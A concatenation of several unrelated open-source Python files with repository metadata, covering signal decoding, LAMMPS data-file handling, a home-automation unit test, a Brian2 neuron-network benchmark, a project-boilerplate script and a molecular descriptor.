    mv = max(spans) * 1.1 # leave some extra room for the rightmost peak of the KDE
    bins = 1000
    step = mv / bins
    x_hps = np.arange(0, mv, step)[:bins]

    # generate kernel density estimate of span histogram
    kde = sp.stats.gaussian_kde(spans, bw_method=0.02)

    # Compute the harmonic product spectrum from the KDE
    # This should leave us with one strong peak for the span corresponding to the
    # fundamental symbol rate.
    hps = kde(x_hps)[:bins] # fundamental spectrum (slice needed because sometimes kde() returns bins+1 elements)

    # Find all peaks in the fundamental spectrum
    all_peaks = find_hist_peaks(hps)
    hps_pairs = zip(x_hps, hps)
    # For each peak, the span value at the peak's maximum density
    all_peak_spans = [max(hps_pairs[pk[0]:pk[1]+1], key=lambda x: x[1])[0] for pk in all_peaks]
    #print('$$$ all peak spans:', all_peak_spans)

    #plt.plot(x_hps, hps / hps[np.argmax(hps)])
    #print('$$$ hps peak:', max(hps))
    tallest_initial_peak = max(hps)

    # isolate the fundamental span width by multiplying downshifted spectra
    for i in xrange(2, spectra+1):
        hps *= kde(np.arange(0, mv*i, step*i))[:len(hps)]
        #k = kde(np.arange(0, mv*i, step*i))[:len(hps)]
        #plt.plot(x_hps, k / k[np.argmax(k)])
        #print('$$$ k peak:', max(k))
        #hps *= k
    #print('$$$ hps peak:', max(hps))

    #plt.plot(x_hps, hps / hps[np.argmax(hps)])
    #plt.show()

    # It is possible to get anomalous HPS peaks with extremely small values.
    # If the tallest peak in the final HPS isn't within three orders of magnitude
    # we will consider the HPS invalid.
    if max(hps) < tallest_initial_peak / 1000.0:
        return 0

    peaks = find_hist_peaks(hps)
    if len(peaks) < 1:
        return 0

    # We want the leftmost (first) peak of the HPS as the fundamental
    # This should be approximately the length of one bit period
    hps_pairs = zip(x_hps, hps)
    peak_span = max(hps_pairs[peaks[0][0]:peaks[0][1]+1], key=lambda x: x[1])[0]

    if peak_span != 0.0:
        # In cases where the 2nd harmonic is missing but the 3rd and 6th are present
        # we can miss the true fundamental span in the HPS.
        # Check if there was a peak span in the pre-HPS spectrum that is 1/3 of this peak.
        # If so then this peak is not likely the true fundamental.
        for pk in all_peak_spans:
            if relatively_equal(pk, peak_span / 3, 0.01):
                #print('$$$ MISSED harmonic', pk, peak_span)
                return 0
        symbol_rate = int(sample_rate / peak_span)
    else:
        symbol_rate = 0

    return symbol_rate
#FIX: clean up use of cur_time, cur_state, cur_state(), next_states, etc.
class EdgeSequence(object):
    '''Utility class to walk through an edge iterator in arbitrary time steps'''

    def __init__(self, edges, time_step, start_time=None):
        '''
        edges (iterator of (float, int) tuples)
            An iterator of 2-tuples representing each edge transition.
            The 2-tuples *must* be in the absolute time form (time, logic level).
            It must support next(); a plain list should be wrapped with iter().

        time_step (float)
            The default time step for advance() when it is called
            without an argument.

        start_time (float)
            The initial starting time for the sequence.

        Raises StreamError when there are less than two elements to the edges iterable
        '''
        self.edges = edges
        self.time_step = time_step
        self.it_end = False  # True once the underlying edge iterator is exhausted

        try:
            # Prime the walk with the current and next edge pair
            self.cur_states = next(self.edges)
            self.next_states = next(self.edges)
        except StopIteration:
            self.it_end = True
            raise StreamError('Not enough edges to initialize edge_sequence() object')

        self.cur_time = self.cur_states[0]

        # Optionally fast-forward to the requested starting time
        if start_time is not None:
            init_step = start_time - self.cur_time
            if init_step > 0.0:
                self.advance(init_step)

    def advance(self, time_step=None):
        '''Move forward through edges by a given amount of time.

        time_step (float)
            The amount of time to move forward. If None, the default
            time_step from the constructor is used.
        '''
        # FIX: was "time_step == None"; identity comparison is the correct idiom
        # and avoids invoking __eq__ on arbitrary arguments.
        if time_step is None:
            time_step = self.time_step
        self.cur_time += time_step
        # Consume edges until the next edge lies at or after the new current time
        while self.cur_time > self.next_states[0]:
            self.cur_states = self.next_states
            try:
                self.next_states = next(self.edges)
            except StopIteration:
                self.it_end = True
                break

    def advance_to_edge(self):
        '''Advance to the next edge in the iterator after the current time

        Returns the amount of time advanced as a float (0.0 once the
        iterator has terminated).
        '''
        if self.it_end:
            return 0.0

        start_state = self.cur_states[1]
        # Skip over edges until the logic state actually changes
        while self.cur_states[1] == start_state:
            self.cur_states = self.next_states
            try:
                self.next_states = next(self.edges)
            except StopIteration:
                # flag end of sequence if the state remains the same (no final edge)
                if self.cur_states[1] == start_state:
                    self.it_end = True
                break

        time_step = self.cur_states[0] - self.cur_time
        self.cur_time = self.cur_states[0]
        return time_step

    def cur_state(self):
        '''The logic level of the edge iterator at the current time'''
        return self.cur_states[1]

    def at_end(self):
        '''Returns True when the edge iterator has terminated'''
        return self.it_end
class MultiEdgeSequence(object):
    '''Utility class to walk through a group of edge iterators in arbitrary time steps'''

    def __init__(self, edge_sets, time_step, start_time=None):
        '''
        edge_sets (dict)
            A dict of edge sequence iterators keyed by the string name of the channel

        time_step (float)
            The default time step for advance() when it is called
            without an argument.

        start_time (float)
            The initial starting time for the sequence.
        '''
        # Parallel tuples: channel_names[i] names the iterator edge_chans[i]
        self.channel_names, self.edge_chans = zip(*edge_sets.items())
        self.sequences = [EdgeSequence(e, time_step, start_time) for e in self.edge_chans]

        # Map from channel name to its index in self.sequences
        self.channel_ids = {}
        for i, cid in enumerate(self.channel_names):
            self.channel_ids[cid] = i

    def advance(self, time_step=None):
        '''Move forward through edges by a given amount of time.

        time_step (float)
            The amount of time to move forward. If None, the default
            time_step from the constructor is used.
        '''
        # All channels advance in lockstep
        for s in self.sequences:
            s.advance(time_step)

    def advance_to_edge(self, channel_name=None):
        '''Advance to the next edge among the edge sets or in a named channel
        after the current time

        channel_name (string)
            If None, the edge sets are advanced to the closest edge after the current
            time. if a valid channel name is provided the edge sets are advanced to
            the closest edge on that channel.

        Returns a tuple (time, channel_name) representing the amount of time advanced
        as a float and the name of the channel containing the edge. If there are no
        unterminated edge sequences then the tuple (0.0, '') is returned.

        Raises ValueError if channel_name is invalid
        '''
        # get the sequence for the channel
        if channel_name is None:
            # find the channel with the nearest edge after the current time
            # that hasn't ended
            active_seq = []
            for s in self.sequences:
                if not s.at_end():
                    active_seq.append(s)

            if len(active_seq) > 0:
                edge_s = min(active_seq, key=lambda x: x.next_states[0])

                # find its channel id
                # NOTE(review): dict.iteritems()/iterkeys() in this class are
                # Python 2 only; .items() / plain "in dict" are the portable forms.
                for k, v in self.channel_ids.iteritems():
                    if self.sequences[v] is edge_s:
                        channel_name = k
                        break
            else: # no active sequences left
                return (0.0, '')
        else:
            # check for channel_name in sets
            if channel_name in self.channel_ids.iterkeys():
                edge_s = self.sequences[self.channel_ids[channel_name]]
            else:
                raise ValueError("Invalid channel name '{0}'".format(channel_name))

        time_step = edge_s.advance_to_edge()

        # advance the other channels to the same time
        if time_step > 0.0:
            for s in self.sequences:
                if not s is edge_s:
                    s.advance(time_step)

        return (time_step, channel_name)

    def cur_state(self, channel_name=None):
        '''Get the current state of the edge sets

        channel_name (string)
            Name of the channel to retrieve state from

        Returns the value of the named channel's state. If channel_name is None
        the state of all channels is returned as a list.

        Raises ValueError if channel_name is invalid
        '''
        if channel_name is None:
            return [s.cur_state() for s in self.sequences]
        else:
            if channel_name in self.channel_ids.iterkeys():
                return self.sequences[self.channel_ids[channel_name]].cur_state()
            else:
                raise ValueError("Invalid channel name '{0}'".format(channel_name))

    def cur_time(self):
        '''Get the current time of the edge sets'''
        # Channels advance in lockstep, so the first sequence's time is representative
        return self.sequences[0].cur_time

    def at_end(self, channel_name=None):
        '''Test if the sequences have ended

        channel_name (string)
            The name of the channel to test for termination

        Returns True when the named edge iterator has terminated. If channel_name is
        None, returns True when all channels in the set have terminated.

        Raises ValueError if channel_name is invalid
        '''
        if channel_name is None:
            return all(s.at_end() for s in self.sequences)
        else:
            if channel_name in self.channel_ids.iterkeys():
                return self.sequences[self.channel_ids[channel_name]].at_end()
            else:
                raise ValueError("Invalid channel name '{0}'".format(channel_name))
| kevinpt/ripyl | ripyl/decode.py | Python | lgpl-3.0 | 48,118 | [
"Gaussian"
] | fc2994fc570f73cee242ccaf758b84bb0e9c6f1348e41b988f780cd92d48963a |
# Pizza.py toolkit, www.cs.sandia.gov/~sjplimp/pizza.html
# Steve Plimpton, sjplimp@sandia.gov, Sandia National Laboratories
#
# Copyright (2005) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
# data tool
# Tool summary strings -- presumably consumed by Pizza.py's help machinery
# (shared convention across Pizza.py tools); confirm against the toolkit docs.
oneline = "Read, write, manipulate LAMMPS data files"

docstr = """
d = data("data.poly") read a LAMMPS data file, can be gzipped
d = data() create an empty data file
d.map(1,"id",3,"x") assign names to atom columns (1-N)
coeffs = d.get("Pair Coeffs") extract info from data file section
q = d.get("Atoms",4)
1 arg = all columns returned as 2d array of floats
2 args = Nth column returned as vector of floats
d.reorder("Atoms",1,3,2,4,5) reorder columns (1-N) in a data file section
1,3,2,4,5 = new order of previous columns, can delete columns this way
d.title = "My LAMMPS data file" set title of the data file
d.headers["atoms"] = 1500 set a header value
d.sections["Bonds"] = lines set a section to list of lines (with newlines)
d.delete("bonds") delete a keyword or section of data file
d.delete("Bonds")
d.replace("Atoms",5,vec) replace Nth column of section with vector
d.newxyz(dmp,1000) replace xyz in Atoms with xyz of snapshot N
newxyz assumes id,x,y,z are defined in both data and dump files
also replaces ix,iy,iz if they are defined
index,time,flag = d.iterator(0/1) loop over single data file snapshot
time,box,atoms,bonds,tris,lines = d.viz(index) return list of viz objects
iterator() and viz() are compatible with equivalent dump calls
iterator() called with arg = 0 first time, with arg = 1 on subsequent calls
index = timestep index within dump object (only 0 for data file)
time = timestep value (only 0 for data file)
flag = -1 when iteration is done, 1 otherwise
viz() returns info for specified timestep index (must be 0)
time = 0
box = [xlo,ylo,zlo,xhi,yhi,zhi]
atoms = id,type,x,y,z for each atom as 2d array
bonds = id,type,x1,y1,z1,x2,y2,z2,t1,t2 for each bond as 2d array
NULL if bonds do not exist
tris = NULL
lines = NULL
d.write("data.new") write a LAMMPS data file
"""
# History
# 8/05, Steve Plimpton (SNL): original version
# 11/07, added triclinic box support
# ToDo list
# Variables
# title = 1st line of data file
# names = dictionary with atom attributes as keys, col #s as values
# headers = dictionary with header name as key, value or tuple as values
# sections = dictionary with section name as key, array of lines as values
# nselect = 1 = # of snapshots
# Imports and external programs
from os import popen
# Fall back to the stock gunzip executable when the user has not pre-defined
# PIZZA_GUNZIP (e.g. in a Pizza.py startup/settings file).
try:
    tmp = PIZZA_GUNZIP
except NameError:  # FIX: bare "except:" swallowed every error; only NameError is expected here
    PIZZA_GUNZIP = "gunzip"
# Class definition
class data:
  '''In-memory representation of a LAMMPS data file.

  Attributes:
    title    - first line of the data file
    names    - dict mapping atom attribute names to column indices (0-based)
    headers  - dict of header keyword -> value (int, or tuple of floats for box bounds)
    sections - dict of section keyword -> list of raw lines (with newlines)
    nselect  - number of snapshots (always 1 for a data file)

  NOTE(review): this module is Python 2 only as written (has_key, xrange,
  "print >>", and the "raise StandardError, msg" statement form).
  '''

  # --------------------------------------------------------------------

  def __init__(self,*list):
    '''Create an empty data file (no args) or read one from disk (one arg).

    A filename ending in ".gz" is read through the PIZZA_GUNZIP command.
    '''
    self.nselect = 1

    if len(list) == 0:
      # No filename: start from an empty, writable data-file skeleton
      self.title = "LAMMPS data file"
      self.names = {}
      self.headers = {}
      self.sections = {}
      return

    file = list[0]
    if file[-3:] == ".gz": f = popen("%s -c %s" % (PIZZA_GUNZIP,file),'r')
    else: f = open(file)

    self.title = f.readline()
    self.names = {}

    # Header pass: every non-blank line containing a known header keyword is
    # parsed; the first unrecognized line terminates the header block.
    headers = {}
    while 1:
      line = f.readline()
      line = line.strip()
      if len(line) == 0:
        continue
      found = 0
      for keyword in hkeywords:
        if line.find(keyword) >= 0:
          found = 1
          words = line.split()
          if keyword == "xlo xhi" or keyword == "ylo yhi" or \
             keyword == "zlo zhi":
            headers[keyword] = (float(words[0]),float(words[1]))
          elif keyword == "xy xz yz":
            headers[keyword] = \
              (float(words[0]),float(words[1]),float(words[2]))
          else:
            headers[keyword] = int(words[0])
      if not found:
        break

    # Section pass: each section's line count comes from the header value it
    # is paired with in skeywords (bottom of this file).
    sections = {}
    while 1:
      found = 0
      for pair in skeywords:
        keyword,length = pair[0],pair[1]
        if keyword == line:
          found = 1
          if not headers.has_key(length):
            raise StandardError, \
              "data section %s has no matching header value" % line
          f.readline()
          # re-uses the "list" name from *list (shadows the builtin)
          list = []
          for i in xrange(headers[length]): list.append(f.readline())
          sections[keyword] = list
      if not found:
        raise StandardError,"invalid section %s in data file" % line
      f.readline()
      line = f.readline()
      if not line:
        break
      line = line.strip()
    f.close()
    self.headers = headers
    self.sections = sections

  # --------------------------------------------------------------------
  # assign names to atom columns

  def map(self,*pairs):
    '''Assign names to atom columns: map(1,"id",3,"x") maps column 1 to "id", etc.

    Column numbers are 1-based in the call; they are stored 0-based in self.names.
    '''
    if len(pairs) % 2 != 0:
      raise StandardError, "data map() requires pairs of mappings"
    for i in range(0,len(pairs),2):
      j = i + 1
      self.names[pairs[j]] = pairs[i]-1

  # --------------------------------------------------------------------
  # extract info from data file fields

  def get(self,*list):
    '''Return section data as floats.

    get(name)    -> all columns as a 2d array of floats
    get(name, n) -> 1-based column n as a vector of floats
    '''
    if len(list) == 1:
      field = list[0]
      array = []
      lines = self.sections[field]
      for line in lines:
        words = line.split()
        values = map(float,words)  # map() yields a list under Python 2
        array.append(values)
      return array
    elif len(list) == 2:
      field = list[0]
      n = list[1] - 1
      vec = []
      lines = self.sections[field]
      for line in lines:
        words = line.split()
        vec.append(float(words[n]))
      return vec
    else:
      raise StandardError, "invalid arguments for data.get()"

  # --------------------------------------------------------------------
  # reorder columns in a data file field

  def reorder(self,name,*order):
    '''Rebuild a section with its columns in the given 1-based order.

    Columns omitted from the order are dropped.
    '''
    n = len(order)
    natoms = len(self.sections[name])
    oldlines = self.sections[name]
    newlines = natoms*[""]
    for index in order:
      for i in xrange(len(newlines)):
        words = oldlines[i].split()
        newlines[i] += words[index-1] + " "
    for i in xrange(len(newlines)):
      newlines[i] += "\n"
    self.sections[name] = newlines

  # --------------------------------------------------------------------
  # replace a column of named section with vector of values

  def replace(self,name,icol,vector):
    '''Overwrite 1-based column icol of the named section with vector's values.'''
    lines = self.sections[name]
    newlines = []
    j = icol - 1
    for i in xrange(len(lines)):
      line = lines[i]
      words = line.split()
      words[j] = str(vector[i])
      newline = ' '.join(words) + '\n'
      newlines.append(newline)
    self.sections[name] = newlines

  # --------------------------------------------------------------------
  # replace x,y,z in Atoms with x,y,z values from snapshot ntime of dump object
  # assumes id,x,y,z are defined in both data and dump files
  # also replaces ix,iy,iz if they are defined

  def newxyz(self,dm,ntime):
    '''Copy coordinates (and image flags if present) from dump snapshot ntime.'''
    nsnap = dm.findtime(ntime)
    dm.sort(ntime)
    x,y,z = dm.vecs(ntime,"x","y","z")
    self.replace("Atoms",self.names['x']+1,x)
    self.replace("Atoms",self.names['y']+1,y)
    self.replace("Atoms",self.names['z']+1,z)
    if dm.names.has_key("ix") and self.names.has_key("ix"):
      ix,iy,iz = dm.vecs(ntime,"ix","iy","iz")
      self.replace("Atoms",self.names['ix']+1,ix)
      self.replace("Atoms",self.names['iy']+1,iy)
      self.replace("Atoms",self.names['iz']+1,iz)

  # --------------------------------------------------------------------
  # delete header value or section from data file

  def delete(self,keyword):
    '''Remove a header keyword or a section by name.'''
    if self.headers.has_key(keyword): del self.headers[keyword]
    elif self.sections.has_key(keyword): del self.sections[keyword]
    else: raise StandardError, "keyword not found in data object"

  # --------------------------------------------------------------------
  # write out a LAMMPS data file

  def write(self,file):
    '''Write this object back out as a LAMMPS data file.'''
    f = open(file,"w")
    print >>f,self.title
    for keyword in hkeywords:
      if self.headers.has_key(keyword):
        if keyword == "xlo xhi" or keyword == "ylo yhi" or \
           keyword == "zlo zhi":
          pair = self.headers[keyword]
          print >>f,pair[0],pair[1],keyword
        elif keyword == "xy xz yz":
          triple = self.headers[keyword]
          print >>f,triple[0],triple[1],triple[2],keyword
        else:
          print >>f,self.headers[keyword],keyword
    for pair in skeywords:
      keyword = pair[0]
      if self.sections.has_key(keyword):
        print >>f,"\n%s\n" % keyword
        for line in self.sections[keyword]:
          print >>f,line,
    f.close()

  # --------------------------------------------------------------------
  # iterator called from other tools

  def iterator(self,flag):
    '''Dump-compatible iterator: call with flag=0 first, flag=1 thereafter.

    Returns (index, time, flag); a data file has one snapshot, so the second
    call always signals completion with flag = -1.
    '''
    if flag == 0: return 0,0,1
    return 0,0,-1

  # --------------------------------------------------------------------
  # time query from other tools

  def findtime(self,n):
    '''Return the snapshot index for timestep n (only n == 0 exists).'''
    if n == 0: return 0
    raise StandardError, "no step %d exists" % (n)

  # --------------------------------------------------------------------
  # return list of atoms and bonds to viz for data object

  def viz(self,isnap):
    '''Return (time, box, atoms, bonds, tris, lines) for visualization tools.'''
    if isnap: raise StandardError, "cannot call data.viz() with isnap != 0"

    # Column indices previously registered via map()
    id = self.names["id"]
    type = self.names["type"]
    x = self.names["x"]
    y = self.names["y"]
    z = self.names["z"]

    xlohi = self.headers["xlo xhi"]
    ylohi = self.headers["ylo yhi"]
    zlohi = self.headers["zlo zhi"]
    box = [xlohi[0],ylohi[0],zlohi[0],xlohi[1],ylohi[1],zlohi[1]]

    # create atom list needed by viz from id,type,x,y,z

    atoms = []
    atomlines = self.sections["Atoms"]
    for line in atomlines:
      words = line.split()
      atoms.append([int(words[id]),int(words[type]),
                    float(words[x]),float(words[y]),float(words[z])])

    # create list of current bond coords from list of bonds
    # assumes atoms are sorted so can lookup up the 2 atoms in each bond

    bonds = []
    if self.sections.has_key("Bonds"):
      bondlines = self.sections["Bonds"]
      for line in bondlines:
        words = line.split()
        bid,btype = int(words[0]),int(words[1])
        atom1,atom2 = int(words[2]),int(words[3])
        atom1words = atomlines[atom1-1].split()
        atom2words = atomlines[atom2-1].split()
        bonds.append([bid,btype,
                      float(atom1words[x]),float(atom1words[y]),
                      float(atom1words[z]),
                      float(atom2words[x]),float(atom2words[y]),
                      float(atom2words[z]),
                      float(atom1words[type]),float(atom2words[type])])

    tris = []
    lines = []
    return 0,box,atoms,bonds,tris,lines

  # --------------------------------------------------------------------
  # return box size

  def maxbox(self):
    '''Return the simulation box as [xlo, ylo, zlo, xhi, yhi, zhi].'''
    xlohi = self.headers["xlo xhi"]
    ylohi = self.headers["ylo yhi"]
    zlohi = self.headers["zlo zhi"]
    return [xlohi[0],ylohi[0],zlohi[0],xlohi[1],ylohi[1],zlohi[1]]

  # --------------------------------------------------------------------
  # return number of atom types

  def maxtype(self):
    '''Return the number of atom types declared in the header.'''
    return self.headers["atom types"]
# --------------------------------------------------------------------
# data file keywords, both header and main sections
# Recognized header keywords: element/interaction counts, type counts, and
# the three (or four, for triclinic) box-bound entries.
hkeywords = ["atoms","ellipsoids","lines","triangles","bodies",
             "bonds","angles","dihedrals","impropers",
             "atom types","bond types","angle types","dihedral types",
             "improper types","xlo xhi","ylo yhi","zlo zhi","xy xz yz"]

# Section keywords, each paired with the header keyword whose value gives the
# section's line count (used by data.__init__ when reading sections).
skeywords = [["Masses","atom types"],
             ["Atoms","atoms"],["Ellipsoids","ellipsoids"],
             ["Lines","lines"],["Triangles","triangles"],["Bodies","bodies"],
             ["Bonds","bonds"],
             ["Angles","angles"],["Dihedrals","dihedrals"],
             ["Impropers","impropers"],["Velocities","atoms"],
             ["Pair Coeffs","atom types"],
             ["Bond Coeffs","bond types"],["Angle Coeffs","angle types"],
             ["Dihedral Coeffs","dihedral types"],
             ["Improper Coeffs","improper types"],
             ["BondBond Coeffs","angle types"],
             ["BondAngle Coeffs","angle types"],
             ["MiddleBondTorsion Coeffs","dihedral types"],
             ["EndBondTorsion Coeffs","dihedral types"],
             ["AngleTorsion Coeffs","dihedral types"],
             ["AngleAngleTorsion Coeffs","dihedral types"],
             ["BondBond13 Coeffs","dihedral types"],
             ["AngleAngle Coeffs","improper types"],
             ["Molecules","atoms"]]
| eddiejessup/pizza | src/data.py | Python | gpl-2.0 | 12,483 | [
"LAMMPS"
] | f48dd58365b09edef1a3b80e3cf02489368804009fd03f70defbb151b5b6f17d |
"""
@name: Modules/Core/Utilities/_test/test_coordinate_tools.py
@author: D. Brian Kimmel
@contact: d.briankimmel@gmail.com
@copyright: 2016-2019 by D. Brian Kimmel
@date: Created on Jun 21, 2016
@licencse: MIT License
@summary:
Passed all 5 tests - DBK 2016-11-22
"""
__updated__ = '2019-09-07'
# Import system type stuff
import xml.etree.ElementTree as ET
from twisted.trial import unittest
# Import PyMh files
from _test.testing_mixin import SetupPyHouseObj
from Modules.Core.Utilities.coordinate_tools import Coords
from Modules.Core.Utilities.debug_tools import PrettyFormatAny
class SetupMixin(object):
    """Shared setUp helper: builds a fresh PyHouse object and exposes Coords as m_api."""

    def setUp(self):
        # New PyHouse fixture per test; m_api is the class under test
        self.m_pyhouse_obj = SetupPyHouseObj().BuildPyHouseObj()
        self.m_api = Coords
class A0(unittest.TestCase):
    """Smoke test: print the suite id so log output identifies this module."""

    def test_00_Print(self):
        # Exercise PrettyFormatAny once so it stays defined/working even when
        # the real print statements are cleaned out of the other tests.
        _l_ignored = PrettyFormatAny.form('_test', 'title', 190)
        print('Id: test_coordinate_tools')
class B1_Coords(SetupMixin, unittest.TestCase):
    """Exercise Coords._get_coords() against the room fixtures.

    NOTE(review): ``JSON`` and the ``TESTING_ROOM_*`` constants are used but
    never imported in this chunk -- presumably provided by a test-data module;
    confirm against the full file.
    """

    def setUp(self):
        SetupMixin.setUp(self)

    def test_01_Corner(self):
        """Corner coordinates parse into X/Y/Z fields."""
        l_ret = self.m_api._get_coords(JSON['Corner'])
        self.assertEqual(str(l_ret.X_Easting), TESTING_ROOM_CORNER_X_3)
        self.assertEqual(str(l_ret.Y_Northing), TESTING_ROOM_CORNER_Y_3)
        self.assertEqual(str(l_ret.Z_Height), TESTING_ROOM_CORNER_Z_3)

    # Renamed from test_2_Size for consistency with the zero-padded numeric
    # naming used by every other test (test_00_, test_01_); this also keeps
    # alphabetic discovery order equal to numeric order.
    def test_02_Size(self):
        """Size coordinates parse into X/Y/Z fields."""
        l_ret = self.m_api._get_coords(JSON['Size'])
        self.assertEqual(str(l_ret.X_Easting), TESTING_ROOM_SIZE_X_3)
        self.assertEqual(str(l_ret.Y_Northing), TESTING_ROOM_SIZE_Y_3)
        self.assertEqual(str(l_ret.Z_Height), TESTING_ROOM_SIZE_Z_3)
# ## END DBK
| DBrianKimmel/PyHouse | Project/src/Modules/Core/Utilities/_test/test_coordinate_tools.py | Python | mit | 1,987 | [
"Brian"
] | a34f575f3da7907305262bf5fb8af7cf744ff17fe648f3e3ac2c2ccdfa2b1961 |
"""
# Notes:
- This simulation seeks to emulate the COBAHH benchmark simulations of (Brette
et al. 2007) using the Brian2 simulator for speed benchmark comparison to
DynaSim. However, this simulation includes CLOCK-DRIVEN synapses, for direct
comparison to DynaSim's clock-driven architecture. The synaptic connections
are "low-density", with only a 2% probability of connection.
- The time taken to simulate will be indicated in the stdout log file
'~/batchdirs/brian_benchmark_COBAHH_clocksyn_lodens_4/pbsout/brian_benchmark_COBAHH_clocksyn_lodens_4.out'
- Note that this code has been slightly modified from the original (Brette et
al. 2007) benchmarking code, available here on ModelDB:
https://senselab.med.yale.edu/modeldb/showModel.cshtml?model=83319 in order
to work with version 2 of the Brian simulator (aka Brian2), and also modified
to change the model being benchmarked, etc.
# References:
- Brette R, Rudolph M, Carnevale T, Hines M, Beeman D, Bower JM, et al.
Simulation of networks of spiking neurons: A review of tools and strategies.
Journal of Computational Neuroscience 2007;23:349–98.
doi:10.1007/s10827-007-0038-6.
- Goodman D, Brette R. Brian: a simulator for spiking neural networks in Python.
Frontiers in Neuroinformatics 2008;2. doi:10.3389/neuro.11.005.2008.
"""
from brian2 import *
# Parameters
cells = 4
defaultclock.dt = 0.01*ms
area = 20000*umetre**2
Cm = (1*ufarad*cmetre**-2) * area
gl = (5e-5*siemens*cmetre**-2) * area
El = -60*mV
EK = -90*mV
ENa = 50*mV
g_na = (100*msiemens*cmetre**-2) * area
g_kd = (30*msiemens*cmetre**-2) * area
VT = -63*mV
# Synaptic strengths
gAMPA = (0.1*msiemens*cmetre**-2)* area
gGABAA = (0.06*msiemens*cmetre**-2)* area
# Synaptic time constants
tauAMPA = 2
tauGABAA = 5
# Synaptic reversal potentials
EAMPA = 1*mV
EGABAA = -80*mV
# The model
eqs = Equations('''
dv/dt = (gl*(El-v)-
gAMPA/cells*sAMPAtotal*(v-EAMPA)-
gGABAA/cells*sGABAAtotal*(v-EGABAA)-
g_na*(m*m*m)*h*(v-ENa)-
g_kd*(n*n*n*n)*(v-EK))/Cm : volt
dm/dt = alpha_m*(1-m)-beta_m*m : 1
dn/dt = alpha_n*(1-n)-beta_n*n : 1
dh/dt = alpha_h*(1-h)-beta_h*h : 1
alpha_m = 0.32*(mV**-1)*(13*mV-v+VT)/
(exp((13*mV-v+VT)/(4*mV))-1.)/ms : Hz
beta_m = 0.28*(mV**-1)*(v-VT-40*mV)/
(exp((v-VT-40*mV)/(5*mV))-1)/ms : Hz
alpha_h = 0.128*exp((17*mV-v+VT)/(18*mV))/ms : Hz
beta_h = 4./(1+exp((40*mV-v+VT)/(5*mV)))/ms : Hz
alpha_n = 0.032*(mV**-1)*(15*mV-v+VT)/
(exp((15*mV-v+VT)/(5*mV))-1.)/ms : Hz
beta_n = .5*exp((10*mV-v+VT)/(40*mV))/ms : Hz
sAMPAtotal : 1
sGABAAtotal : 1
''')
# Construct intrinsic cells
P = NeuronGroup(cells, model=eqs, method='euler')
proportion=int(0.8*cells)
Pe = P[:proportion]
Pi = P[proportion:]
# Contruct synaptic network
sAMPA=Synapses(Pe,P,
model='''ds/dt=1000.*5.*(1 + tanh(v_pre/(4.*mV)))*(1-s)/ms - (s)/(2*ms) : 1 (clock-driven)
sAMPAtotal_post = s : 1 (summed)
''')
sAMPA.connect(p=0.02)
sGABAA_RETC=Synapses(Pi,P,
model='''ds/dt=1000.*2.*(1 + tanh(v_pre/(4.*mV)))*(1-s)/ms - s/(5*ms) : 1 (clock-driven)
sGABAAtotal_post = s : 1 (summed)
''')
sGABAA_RETC.connect(p=0.02)
# Initialization
P.v = 'El + (randn() * 5 - 5)*mV'
# Record a few traces
trace = StateMonitor(P, 'v', record=[1, 10, 100])
totaldata = StateMonitor(P, 'v', record=True)
run(0.5 * second, report='text')
# # If you want to plot:
# plot(trace.t/ms, trace[1].v/mV)
# plot(trace.t/ms, trace[10].v/mV)
# plot(trace.t/ms, trace[100].v/mV)
# xlabel('t (ms)')
# ylabel('v (mV)')
# show()
# # If you want to save data:
# print("Saving TC cell voltages!")
# numpy.savetxt("foo_totaldata.csv", totaldata.v/mV, delimiter=",")
| asoplata/dynasim-benchmark-brette-2007 | output/Brian2/brian2_benchmark_COBAHH_clocksyn_lodens_0004/brian2_benchmark_COBAHH_clocksyn_lodens_0004.py | Python | gpl-3.0 | 3,772 | [
"Brian"
] | 0e60a10162104b807e8efc284dd5f1ae1d6c8ebf566ea5504c8484f879d47057 |
#!/usr/bin/env python
# Interactive (Python 2) scaffolding script: clones a GitHub boilerplate repo
# and rewrites its package.json with new project metadata.
from subprocess import call
import shutil
import simplejson
from collections import OrderedDict
import os
from GitBoil import Boil

### TODO
# make README.md blank
# update key words
# https://github.com/jamesrhaley/es2015-babel-gulp-jasmine.git

new_name = raw_input("what should the project be called now: ")

if not os.path.isdir(new_name):
    ######## ------ gather info and download files ------ ############
    # get all of the needed info to down load the file and update it
    url = raw_input("what github url should we clone: ")
    Boil.git_clone(url, new_name)
    author = raw_input("new author: ")
    description = raw_input("new description: ")
    # NOTE(review): version/licence are collected but never written into
    # package.json -- presumably intentional placeholders; confirm.
    version = raw_input("version?(1.0.0): ")
    licence = raw_input("licence?(MIT): ")

    ######## ------ edit package.json ------- ###########
    pack_path = new_name + '/package.json'

    # BUG FIX: the original opened package.json without ever closing the
    # handle and printed every line twice while normalizing (leftover
    # debugging, per the author's own comment). Read with a context manager
    # and strip per-line whitespace before parsing.
    with open(pack_path, 'r') as json_file:
        together = ''.join(line.strip() for line in json_file.read().split('\n'))

    # load json as an OrderedDict to retain original key order
    data = simplejson.loads(together, object_pairs_hook=OrderedDict)

    # update fields. Need to update keywords
    data["name"] = new_name
    data["author"] = author
    data["description"] = description

    # serialize and rewrite package.json (remove + recreate, as before)
    outfile = simplejson.dumps(data, indent=4)
    os.remove(pack_path)
    with open(pack_path, 'w') as new_pack:
        new_pack.write(outfile)

    Boil.remove_licence(new_name)
    Boil.clean_readme(new_name)
else:
    # BUG FIX: corrected user-facing typo "exits" -> "exists".
    string = '\nThat directory already exists!!\nPlease come up with a new name.\n'
    print(string)
| jamesrhaley/boilJS | boil_JS.py | Python | mit | 1,987 | [
"GULP"
] | 18467e4bb4ca661a10e125dc9dea12db1d06426080aedf1c27adc81a1b68b315 |
import rdkit.Chem.GraphDescriptors as RDKit
from ._base import Descriptor
from ._graph_matrix import DistanceMatrix
__all__ = ("BalabanJ",)
class BalabanJ(Descriptor):
    r"""Balaban's J index descriptor (thin wrapper around the RDKit implementation)."""

    since = "1.0.0"
    __slots__ = ()
    explicit_hydrogens = False

    def description(self):
        """Human-readable name of this descriptor."""
        return "Balaban's J index"

    @classmethod
    def preset(cls, version):
        """Yield the single default-configured instance."""
        yield cls()

    def parameters(self):
        """No tunable parameters."""
        return ()

    def __str__(self):
        return type(self).__name__

    def dependencies(self):
        """Require the distance matrix (heavy atoms only) as input 'D'."""
        return {"D": DistanceMatrix(self.explicit_hydrogens)}

    def calculate(self, D):
        """Delegate to RDKit, reusing the precomputed distance matrix."""
        return float(RDKit.BalabanJ(self.mol, dMat=D))

    rtype = float
